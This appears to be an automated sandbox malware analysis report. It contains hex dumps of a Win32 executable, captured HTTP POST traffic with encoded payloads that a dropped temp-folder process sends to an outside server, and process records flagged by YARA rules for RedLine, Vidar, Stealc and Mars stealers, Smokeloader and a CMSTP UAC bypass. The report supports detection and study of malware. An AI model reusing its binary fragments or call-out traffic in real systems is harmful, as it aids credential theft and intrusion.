                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65
                                                                                                                                                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@@Boole
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850080013 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                                                                                                                                                      Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850090981 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                                                                                                                                                      Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850101948 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                                                                                                                                                      Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850112915 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                                                                                                                                                      Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850163937 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                                                                                      Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850177050 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                                                                                                                                                      Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850194931 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                                                                                      Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850207090 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850218058 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                                                                                      Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.052480936 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                                                                                      Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.54971820.157.87.45801784C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:22.612129927 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 300
                                                                                                                                                                                                                                                                                      Host: svc.iolo.com
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:22.816301107 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0fFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:23.020081043 CEST469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      cache-control: private
                                                                                                                                                                                                                                                                                      content-length: 256
                                                                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                      x-whom: Ioloweb8
                                                                                                                                                                                                                                                                                      date: Tue, 23 Apr 2024 07:28:11 GMT
                                                                                                                                                                                                                                                                                      set-cookie: SERVERID=svc8; path=/
                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                      Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                                                                                      Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.54973720.157.87.45801784C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:39.018325090 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 300
                                                                                                                                                                                                                                                                                      Host: svc.iolo.com
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:39.228044987 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0tiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:39.441235065 CEST405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      cache-control: private
                                                                                                                                                                                                                                                                                      content-length: 192
                                                                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                      x-whom: Ioloweb4
                                                                                                                                                                                                                                                                                      date: Tue, 23 Apr 2024 07:28:27 GMT
                                                                                                                                                                                                                                                                                      set-cookie: SERVERID=svc4; path=/
                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                      Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                                                                                      Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:09:27:55
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\4BfhCycV4B.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:485'377 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:71EF0FB3BE89DC92FCBE7A6E8E6D6EE8
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                      Start time:09:27:59
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3z0.0.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:336'384 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:65A31455A497CAEE44C5AA749C50E40B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                      Start time:09:28:13
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:8'538'160 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                      Start time:09:28:17
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x340000
                                                                                                                                                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                      Start time:09:28:17
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Imagebase:0xf60000
                                                                                                                                                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                      Start time:09:28:19
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x790000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:8
